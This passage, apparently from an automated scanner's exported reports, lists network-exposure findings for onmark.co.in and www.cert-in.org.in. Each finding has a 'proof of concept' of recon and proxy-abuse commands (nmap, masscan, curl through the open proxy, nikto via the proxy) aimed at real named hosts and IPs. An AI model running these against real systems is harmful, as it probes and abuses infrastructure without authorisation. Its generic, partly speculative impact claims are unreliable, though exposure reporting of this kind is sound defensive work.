Their discovery enables attackers to gain early-stage access, extract internal artifacts, or manipulate backend processes before engaging with core assets.\n\n---\n\n### Open HTTP Proxy Service on Port 8015/tcp – FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description**  \nPort 8015/tcp runs an HTTP proxy identified as FortiGuard Web Filtering—an enterprise-grade filtering solution designed to enforce web access policies. Exposing such a service externally raises concerns about bypassing local filtering rules, unauthorized proxy chaining, or misuse for anonymizing malicious traffic.\n\nMisconfigured proxies can allow unrestricted outbound connections, effectively turning the organization’s infrastructure into an open relay for external actors.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker confirms proxy operation:\n   ```bash\n   curl --proxy http://onmark.co.in:8015 http://example.com\n   ```\n2. If successful, they route arbitrary traffic through the proxy to obfuscate origin:\n   ```bash\n   curl --proxy http://onmark.co.in:8015 https://target-site.com\n   ```\n3. Advanced usage involves tunneling other protocols or conducting blind SSRF-style attacks against internal services reachable from the proxy host.\n\n**Business Impact**  \nPublicly accessible HTTP proxies introduce substantial abuse potential, including facilitating phishing campaigns, malware propagation, and evasion of corporate firewalls. 
Additionally, reputation damage occurs when blacklists flag the organization’s IP addresses for proxy misuse.\n\n---\n\n### Open HTTP Proxy Service on Port 8020/tcp – FortiGuard Web Filtering\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | onmark.co.in |\n\n**Description**  \nAnother FortiGuard Web Filtering proxy instance listens on port 8020/tcp for `onmark.co.in`. As with port 8015, this setup introduces risks around unauthorized proxy utilization and circumvention of policy enforcement.\n\nMultiple proxy instances suggest either redundancy or segmentation strategies, neither of which justifies public accessibility without strict access controls and logging mechanisms.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker verifies proxy functionality:\n   ```bash\n   curl --proxy http://onmark.co.in:8020 http://ifconfig.me\n   ```\n2. They utilize the proxy to mask their identity while performing reconnaissance or launching attacks:\n   ```bash\n   nikto -h http://internal-service.local -useproxy http://onmark.co.in:8020\n   ```\n3. Should internal services be reachable, the attacker gains indirect access to otherwise isolated systems.\n\n**Business Impact**  \nDual proxy exposure amplifies the likelihood of abuse and complicates incident attribution. 
Organizations face elevated exposure to legal liability, regulatory scrutiny, and reputational harm if their infrastructure facilitates illicit activity routed through these endpoints.","summary":{"total":9}},"summary":{"total":9}},{"_id":{"$oid":"6a1f34fea838d48738358ced"},"created_at":{"$date":"2026-06-02T19:54:38.274Z"},"url":"https://www.cert-in.org.in/","tool":"generate_network_exposure_report","result":{"url":"https://www.cert-in.org.in/","category":"network_exposure","timestamp":"2026-06-02T19:54:38.267613+00:00","report":"### Open Port 8015/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description**  \nPort 8015/tcp is open on the host at IP address `14.139.54.229`. This port typically serves as a non-standard HTTP proxy or application-specific communication endpoint. The exposure of such ports without proper access controls can lead to unauthorized access, information disclosure, or serve as an entry point for lateral movement within the internal network if misconfigured.\n\nAn attacker may identify this port using standard reconnaissance tools like Nmap or Masscan during initial enumeration phases.\n\n**Attack Scenario (Proof of Concept)**  \n1. An attacker performs a SYN scan targeting `14.139.54.229`:\n   ```bash\n   nmap -p 8015 14.139.54.229\n   ```\n2. Upon discovering that port 8015 is open, they attempt to connect via browser or curl:\n   ```bash\n   curl http://14.139.54.229:8015/\n   ```\n3. If the service responds with content or headers indicating it's acting as a proxy or exposing internal resources, further probing could reveal sensitive endpoints or allow tunneling into internal systems.\n\n**Business Impact**  \nExposing arbitrary TCP ports increases the attack surface unnecessarily. 
While not inherently exploitable, unmanaged services running on these ports often lack monitoring and hardening practices, potentially leading to compromise if vulnerabilities exist in the underlying software.\n\n---\n\n### Open Port 8020/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description**  \nPort 8020/tcp is open on the system located at `14.139.54.229`. Similar to other high-numbered ports, this may indicate a custom web server, reverse proxy, API gateway, or middleware component used internally. Without authentication or encryption mechanisms, such services pose risks including data leakage or abuse by malicious actors.\n\nAttackers commonly use automated scanners to detect exposed services across large IP ranges.\n\n**Attack Scenario (Proof of Concept)**  \n1. A scanner identifies port 8020 as open:\n   ```bash\n   masscan -p8020 14.139.54.229\n   ```\n2. The attacker connects directly:\n   ```bash\n   nc 14.139.54.229 8020\n   GET / HTTP/1.1\n   Host: 14.139.54.229\n   ```\n3. Depending on response behavior, the attacker might exploit weak configurations or outdated versions of backend applications listening on this port.\n\n**Business Impact**  \nUnintended exposure of internal services can result in unauthorized access to administrative interfaces, configuration files, or APIs. Even if benign, unnecessary open ports increase risk due to potential future misconfigurations or undetected vulnerabilities.\n\n---\n\n### Open Port 8008/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description**  \nThe presence of an open port 8008/tcp indicates another instance of a potentially non-standard HTTP-based service hosted on `14.139.54.229`. 
Historically associated with alternative HTTP servers or embedded device management interfaces, this port should be carefully evaluated for purpose, accessibility, and security posture.\n\nIf left unrestricted, attackers may leverage this interface for reconnaissance or exploitation depending on its implementation.\n\n**Attack Scenario (Proof of Concept)**  \n1. Reconnaissance reveals port 8008 is active:\n   ```bash\n   nmap -sV -p 8008 14.139.54.229\n   ```\n2. The attacker sends an HTTP request:\n   ```bash\n   curl -I http://14.139.54.229:8008/\n   ```\n3. Based on returned headers or responses, the attacker attempts directory traversal, brute-force login, or exploits known CVEs related to the identified service version.\n\n**Business Impact**  \nEach additional open port expands the organization’s digital footprint and introduces new vectors for compromise. Insecurely configured services on alternate ports are frequently overlooked in audits but remain accessible to adversaries conducting broad-spectrum scanning campaigns.\n\n---\n\n### Open Port 80/tcp on 59.176.167.109\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 59.176.167.109 |\n\n**Description**  \nPort 80/tcp is open on the asset `59.176.167.109`, which corresponds to the domain `https://www.cert-in.org.in/`. This represents the default HTTP port and is expected for public-facing websites. However, when combined with HTTPS-only policies, plain HTTP availability may introduce downgrade attacks or mixed-content issues unless properly redirected.\n\nThis finding confirms basic connectivity and visibility from external networks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker initiates connection over HTTP:\n   ```bash\n   curl http://59.176.167.109/\n   ```\n2. 
If redirection is missing or improperly enforced, sensitive cookies or session tokens transmitted over HTTP could be intercepted.\n3. Alternatively, phishing pages mimicking legitimate domains may be served here if the server lacks strict TLS enforcement.\n\n**Business Impact**  \nWhile essential for website functionality, insecure handling of HTTP traffic undermines trust and compliance frameworks requiring encrypted communications. Organizations relying solely on HTTP expose users to man-in-the-middle threats and violate best practices around secure transport.\n\n---\n\n### Open Port 443/tcp on 59.176.167.109\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 59.176.167.109 |\n\n**Description**  \nPort 443/tcp is open on `59.176.167.109`, signifying support for HTTPS connections. As the standard port for secure web communication, this is necessary for protecting user privacy and ensuring integrity of transmitted data. Proper certificate validation and cipher suite selection are critical to maintaining this protection layer.\n\nMisconfigurations in SSL/TLS settings can still leave systems vulnerable despite having port 443 open.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker checks TLS configuration:\n   ```bash\n   openssl s_client -connect 59.176.167.109:443 -servername www.cert-in.org.in\n   ```\n2. Weak protocols (e.g., TLS 1.0), expired certificates, or insufficient key lengths may be discovered.\n3. These flaws enable downgrade attacks or certificate spoofing under certain conditions.\n\n**Business Impact**  \nFailure to maintain robust TLS implementations erodes confidence in online transactions and exposes organizations to regulatory scrutiny. 
Poor cryptographic hygiene also facilitates interception of confidential communications, undermining both legal and operational security objectives.\n\n---\n\n### Open Port 80/tcp (HTTP) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nThe domain `www.cert-in.org.in` has port 80 open, serving HTTP traffic. Although common practice for redirecting to HTTPS, failure to enforce redirects leaves room for plaintext transmission of credentials or session identifiers. Additionally, legacy clients or crawlers may continue accessing insecure endpoints unless explicitly blocked.\n\nThis represents a baseline requirement for modern web infrastructure but requires careful policy enforcement.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker accesses insecure endpoint:\n   ```bash\n   curl http://www.cert-in.org.in/\n   ```\n2. If no automatic redirect occurs, forms or links pointing to insecure paths may leak sensitive input.\n3. Passive eavesdropping becomes feasible on shared or compromised networks.\n\n**Business Impact**  \nInconsistent application of HTTPS policies weakens overall cybersecurity resilience. Regulatory bodies increasingly mandate full encryption for all web interactions, making partial coverage a liability rather than a convenience.\n\n---\n\n### Open Port 443/tcp (HTTPS) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nPort 443/tcp is confirmed open on `www.cert-in.org.in`, enabling encrypted web browsing. This is crucial for safeguarding visitor interactions, especially those involving personal or classified information. 
Ensuring up-to-date TLS versions, strong ciphers, and valid certificates remains paramount to preserving confidentiality and authenticity.\n\nAny lapses in certificate lifecycle management or protocol support degrade trustworthiness.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker inspects certificate chain:\n   ```bash\n   echo | openssl s_client -showcerts -connect www.cert-in.org.in:443 2>/dev/null | openssl x509 -text -noout\n   ```\n2. Expired or self-signed certificates raise flags about legitimacy.\n3. Outdated protocols like SSLv3 or RC4 usage signal poor cryptographic hygiene.\n\n**Business Impact**  \nA flawed HTTPS setup damages credibility and violates compliance standards such as PCI DSS or GDPR. Users encountering warnings or errors may abandon engagement entirely, impacting mission-critical outreach efforts typical for CERT-type institutions.\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nAn auxiliary HTTP listener operates on port 8008 for `www.cert-in.org.in`. Such secondary ports often host development environments, staging areas, or internal dashboards inadvertently exposed to the internet. Their inclusion in production environments demands rigorous review and justification.\n\nImproperly secured alternate ports provide attackers with low-hanging fruit for gaining footholds inside protected perimeters.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker probes alternate port:\n   ```bash\n   curl http://www.cert-in.org.in:8008/\n   ```\n2. Responses revealing debug output, stack traces, or admin panels suggest inadequate sanitization.\n3. 
Brute-force attempts against login portals found on such ports frequently succeed due to weaker credential policies.\n\n**Business Impact**  \nSecondary HTTP listeners bypass primary defense layers designed for mainline traffic. They often escape routine patch cycles or logging regimes, creating blind spots where breaches go undetected until significant damage accumulates.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nPort 8015 hosts an HTTP proxy service identified as Fortinet’s FortiGuard Web Filtering solution. Proxies deployed externally without stringent access control create opportunities for misuse, including bypassing filtering rules or leveraging them for anonymized traffic relay.\n\nGiven their role in enforcing organizational policies, exposing such components publicly contradicts intended deployment models.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker tests proxy capabilities:\n   ```bash\n   curl --proxy http://www.cert-in.org.in:8015 http://example.com\n   ```\n2. Successful relay confirms functional proxy operation.\n3. Malicious actors may route illicit traffic through the proxy to obfuscate origins or evade detection.\n\n**Business Impact**  \nPublicly accessible proxies undermine network governance and expose organizations to legal liabilities stemming from abuse. 
Misuse scenarios include spam relaying, malware distribution, or circumvention of parental/governmental restrictions—particularly concerning for entities like CERT-IN.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nSimilar to port 8015, port 8020 runs a FortiGuard Web Filtering proxy. Multiple proxy instances exposed simultaneously suggest either redundancy or misconfiguration. Regardless, each constitutes a potential vector for unauthorized access or abuse unless strictly controlled.\n\nSuch exposures conflict with zero-trust principles and increase complexity in managing access boundaries.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker verifies proxy functionality:\n   ```bash\n   curl --proxy http://www.cert-in.org.in:8020 https://target-site.com\n   ```\n2. If successful, the proxy can be leveraged for outbound scanning, tunneling, or evading local firewalls.\n3. Automated scripts may cycle between available proxies seeking one with relaxed restrictions.\n\n**Business Impact**  \nMultiple exposed proxies amplify the risk profile significantly. Even if individually benign, collectively they form a distributed attack platform ripe for exploitation by threat actors seeking anonymity or evasion techniques.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description**  \nThe domain `www.cert-in.org.in` appears listed on the DNS blacklist `list.quorum.to` for sending spam emails. Being blacklisted affects email deliverability and tarnishes institutional reputation. 
It suggests either compromised mail servers, misconfigured SMTP relays, or spoofed sender identities originating from the domain/IP space.\n\nReputation recovery involves delisting procedures and root cause analysis.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker compromises a server within the domain’s subnet.\n2. Installs an open relay SMTP daemon or uses existing ones.\n3. Sends bulk unsolicited messages masquerading as legitimate senders.\n4. Anti-spam filters flag the originating IPs, resulting in listing on quorum.to.\n\n**Business Impact**  \nBlacklisting severely impacts official correspondence delivery rates, affecting stakeholder communications and emergency alerts. Reputational harm extends beyond technical circles, influencing public perception of competence and reliability—especially detrimental for authoritative cybersecurity agencies.","summary":{"total":11}},"summary":{"total":11}}]